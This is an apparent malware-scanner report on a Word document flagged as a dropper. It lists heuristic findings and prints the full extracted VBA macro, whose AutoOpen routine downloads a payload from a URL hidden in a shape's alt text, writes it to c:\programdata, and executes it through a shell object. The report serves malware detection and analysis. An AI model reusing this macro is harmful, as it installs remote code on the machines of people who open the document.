Verdict: MALICIOUS
Risk score: 170

Heuristics (6)

- ClamAV: Doc.Dropper.Generic-9823775-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Generic-9823775-0.
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): the document contains a VBA project; VBA macros are present.
- CreateObject call (high, OLE_VBA_CREATEOBJ): matched line in script: `Set dyUeu = CreateObject("WinHttp.WinHttpRequest.5.1")`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): matched line in script: `Sub AutoOpen()`
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas, in document text (OOXML body / shared strings).
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11024 bytes |

SHA-256 (macros.bas): 495f0cdc8ed05fc93419297a8d832a7e8c5661534857551964a1cfeabae0cccc

Preview of script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "mzfIb"
Sub AFIbP(dTaZx, Optional ByVal lRRbi As String = "c:\programdata\OspNm.pdf")
' Dietitian spills deactivate
' Neediness acquaintance ore
' Tinkly customers hardhit clucking
' Uncrushable essences numbering abased
' Extremal
' Stereotypically entrapment
' Peeling
' Congratulating absorb
' Papers camcorder communing
' Fulminant karakul haulage
' Crumples sensibleness
' Vacuously unprofitable jellify
' Carcinomas disillusioned triglyceride inveterate repackaged
' Creditability ovation calibrated dialog interconnect
' Procreating canticles foots shaker angled crucifixes marquess
' Pawing
' Chamomile antler horrifies
' Sacrilege mass
' Notebooks tomahawks
' Radiations workmate superfluities derivative
' Miserly smirks sedges inheritors adenoid gasket
' Corpuscle introduction despise
' Manifest pronunciations raised
' Albeit besmirch peninsula poet cascade boon
' Redecoration refineries wages isolated inability dissertation icosahedral
' Chunks ignition klick pedestal
' Linking enlace roughened obliterating
' Tollgate ebony
' Typically interject
' Aunts quadrants regattas martyry whalebone
' Wanly impersonal sketchily turpentine commonalities
' Emigrate guardianship lambda
' Bogglingly epitaph spaceflight capri gossiped
' Outages mitochondria glittering
' Gravitation lissomeness outings
wpBsJ = lRRbi
Open wpBsJ For Output As #1
' Mingles thespian concisely mythologies sheathing
' Bibliography
' Elope
' Gratuitous disagreed sultana
' Howsoever complements ranching
' Devastatingly cliff differ sallied
Print #1, dTaZx
' Multiphase beeswax circularly dracone recounts repulsion
' Carry maydays flavours
' Quackish confronted integrating fancy tigris
' Indivisible editions weeded erasable hatchery terriers hubcaps
' Threshold fluxes textures barged voracity eigenstate
' Choirboys
Close #1
End Sub
' Comrade macaroni eyelevel adapted genets
' Strikers operand
' Some preferment cradling inputs clearheaded hitch reversed
' Octogenarians painfully armada blindfolds
' Examiners maturely
' Conservatism lies superfix teddies step fourthly codename
Sub AutoOpen()
' Renumbering dismissed hatful moonbeams bossier paperback levered
' Feast chalks menace
' Woods espousal temperately
' Anorexic nineteenth regimes warped mat
' Floodlights smouldering nyala symmetrising
' Eurasian bovine decency
' Flippable strays
' Summery shops
' Cubs pub swearers post forecourt
' Rosy prostitutes sweetcorn
' Waterworks believes
' Indelible pipework
' Existed workfare abortionist
' Ferrous unshared
' Yeaned glutted unexpanded
' Adenine solubility conics substitution socially
' Monocled astutely
' Inn continuum birefringence denaturing
' Genitals satanism accosting testosterone brightest
' Bowing inventing
' Confiscating announces ambuscade electorate retrieves
' Relight pig larynx
' Swarming neuter ails transverse niggling
' Aligning siphoned lamps cannibalism
' Food scriptural browsers
' Studied centipede
' Dimensional
' Peerages phenomenological
' Baffles ashtrays reversion
' Alleys winnable objectless dismally handcar
' Pleasantness calcutta
' Untidiest miracles
Dim OmTDk As New StUck
' Couplet
' Foisted condenser tempests reshape
' Enfranchising yorkers dried rocs macaroon
' Anticlockwise fungicidal rhythmically landlines
dTaZx = OmTDk.aoEZx()
' Epicycloid daniel
' Wards broadloom
' Commerce plumbed proletariat
' Blamelessly westerner burped woods cloudscapes
' Pushers imbecilic emanate preacher deductively
AFIbP nOexE(dTaZx)
' Involves bloods baroque empty
' Aitches cajoling
' Singularity disadvantaged
' Tweeds repressed
' Professes chiming drumming backtracking
' Caressingly chinks lobelia memorial retitled constructor corrals
' Rears upgradings revalue
' Evocatively graduated miracle exploited craned
' Coulomb teething excitable peeping footpaths debacles
' Highpitched circumlocution refutation unloading keenest
' Mobilise
' Tolerable technical excavating
' Crossexamination latest scarp
bEPmi fzZdP(0) + "r32 c:\programdata\OspNm.pdf", ""
End Sub
Function DMzgV(KTqcT, aGzbH)
' Aquarium silently
' Upstage fatuously
' Flashbacks rays snarling shrimp applet
' Maternity ionic frenziedly unaccompanied
' Spooling predominance prognoses
' Bloodthirsty subways trespass grocer
DMzgV = Split(KTqcT, aGzbH)
End Function
Attribute VB_Name = "ulddS"
' Tucks empowered discover distorts spokespeople
' Denotations
' Unstressed persevering
' Wood laughter impulsive
' Gigantically understatement encrustation reprimand
Function nOexE(ftHdb)
' Evenings extensionally
' Loses jaunty
' Tantamount pilgrims boater
' Deafest bevels outcast
' Rhein drummers unimpaired
' Auction ravishingly shouldered revives
nOexE = StrConv(ftHdb, vbUnicode)
' Perused morphism rerouteing weekends
' Oration priceless dodgem
' Stagnated sedate jaywalk organist
' Tribally slams allegories
' Furtive disaffiliate glaciers
' Polytheism vandal technophobic
End Function
' Comings feint roistering reprocessing spigot
' Flourishing tarantula reabsorb foreboding repossession
' Tartan proposing smudge
' Truer dewdrops unlovable
' Kalahari random
Function LhKph()
' Mucous beholding
' Latecomers scrutineers fireproof dockland
' Flat plodding lemonade kite optician
' Nucleic druid unconventional reconcilable
' Answers culvert whiffs bamboo donga
' Crammer spaceage woes stainless
' Haphazard campsite splodge possum downy orangutan
' Harmonium plurality humanoid decimating
' Polyesters
' Outstrips lacquers
' Opponent
' Malign white waive compacts
LhKph = ActiveDocument.shapes(1).AlternativeText
End Function
' Germanium stealthy
' Magisterially compresses insecticides
' Whoa flowerless prescriptive attenuators
' Rebate quarts
' Skimp reimburses
' Eliminations gateau curtsy seesaw
Function fzZdP(ULufu)
' Hullabaloo wholeheartedly ton reginas
' Rapid faceted recognisances smell
' Colourised demoralised scrappiest
' Mispronunciations cations
' Unstamped fretfulness regarded gelatin invalidation
' Remuneration refused curatorial lactation
' Doom centreing square
' Jugglers septet perishing idiom
' Revisiting eves torts respectively brown
' Coop recount landfill rerolled
' Conveying riboflavin dines contemptuous interbreed townscape
' Risk catalytic alacrity preparatory
dBTpo = LhKph()
Hjdyi = DMzgV(dBTpo, "kristi")
KbXDU = Hjdyi(ULufu)
fzZdP = KbXDU
End Function
Attribute VB_Name = "StUck"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Evening gerontology fumbling oblivion inferred
' Electrostatic mobilised zebu cubistic sensually
' Sightlessly overrun
' Pillbox woeful replica forebodings amazement
' Apoplectic donga reaffirming
Function aoEZx()
' Chewy
' Afield nudity retrievals
' Valedictory vestal jilted repercussion
' Entwining conduction boreal
' Fussier
' Crispy republics
Dim dyUeu As Object
' Formidable welterweight fondant figments
' Medication detester
' Sprigs
' Birefringence neurologist
' Touchiest tractor weathermen tithes reconstructed
Set dyUeu = CreateObject("WinHttp.WinHttpRequest.5.1")
' Tensor mistranslating texas overtake spilt
' Dashes microbiology blowed conquistadores flowerless ignited
' Ranch birdbaths
' Etal voluminous dispersive
' Accreditation managerially pronunciation climber prophetess assents conquered
' Swoop
' Colloid snaffle
' Mothersinlaw pugs
' Ordered plaintiffs
' Slanting solemn brushwork saturated
' Disinterestedness farriers can caribou acolyte
' Prosecuting adjacent confiscate
' Supremely beefy
' Godlike cringes vegetation
' Heretofore rifting newsagents cupidinously
' Soldiered cherryred spyhole
' Pulverisation lacks littoral stead buoys retrained aeration ingest
' Stressed
' Ineffectively baldest nomination babyish trikes flow
' Gouged sprang
' Be confuse wainscot cystine extraditable fits
' Metalled turkeys mucous
' Blackmailing modelling reprehensible youths
' Downturn leaderships refit radium
spIER = fzZdP(1)
' Extendability
' Prognoses skipper
' Yorker under ruined dependants
' Fished reformer tracking lunchers legionaries
' Braids
dyUeu.Open "GET", spIER, False
' Deterrents ligaments
' Transparencies forlornness blushers stoat humiliations derived
' Imagining stellated watercolour
' Peeper jurassic
' Coronaries emulsifies relied dense
' Apnoea guidebooks envelops
' Connectedness waived
dyUeu.Send
' Tickles
' Globular
' Equipping gratitude knows
' Approvingly ninety hurtles
' Gingham racket
aoEZx = dyUeu.responsebody
End Function
Attribute VB_Name = "aNVci"
Sub bEPmi(dNCVH, AiRIA)
' Spiny crimson rhodesia unutterable
' Parrots hogger repositioning
' Moor sweated meditates
' Rung consoling schooling
' Note purgative
' Barrages misidentification anybody referrals
' Overcame profiteers outspoken screeching
' Deflating toadstool
' Speech militant miscalculation comprise
Set bXSBQ = CreateObject(AiRIA + fzZdP(2) + "ll").exec(dNCVH)
' Creamery lumping ineffectively mapper resource transfigured
' Reproduce econometric tycoon
' Oxalate glowing scenes
' Afflicted mollifies wicker aerobatics
' Lifetaking amply moult lifetime
' Adenine controversy miniaturises photographer coup threedimensional
' Pizza suppurating manipulation enunciated
' Clambering sherry lifeline flicker miscarried
' Conjugacy delta isotropic including
' Folded destined robotic infinity divide
' Facia infiltration
' Reverberates understate booksellers
' Generalised alphabet
' Waiters
' Ratty internments grammars contradiction vestment
' Precept volunteer
' Freak cannery disastrously deadline numeral
' Stealer kindheartedness carbonyl subharmonics monitored
' Tankful lineally
' Growers motes brightened nosier
' Parochial callgirl
' Technologies
' Romancer afternoon
' Moats sportingly roarer
' Avoids ibises bluffing pachyderm tremendously complied
' Choppers tumbled steeps solutes
' Sprinkling resuscitating cockroaches centennial
' Aches sauna quadruple festered
' Pulsated inheritable amulets
' Tuppence
' Bowsprit aquariums farfetched limply noiselessly
' Miscomprehended hydra remaining
' Antiquary mafiosi despair hallway
' Molluscan holes censorship chainsmoke coerce
' Easter generalists
' Baccarat distinctively depraves cohere
' Merged beggary bashing
' Ramming fogey whipped
' Sexless reminiscing cases
' Egyptian bradawl
' Fruit flameproof hake nudists digitise
End Sub

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 42496 bytes |

SHA-256 (vbaProject_00.bin): c341b18cc7222701d40bd67a2fa228ff01b21ffc649e0de6c22c262eff5cc55d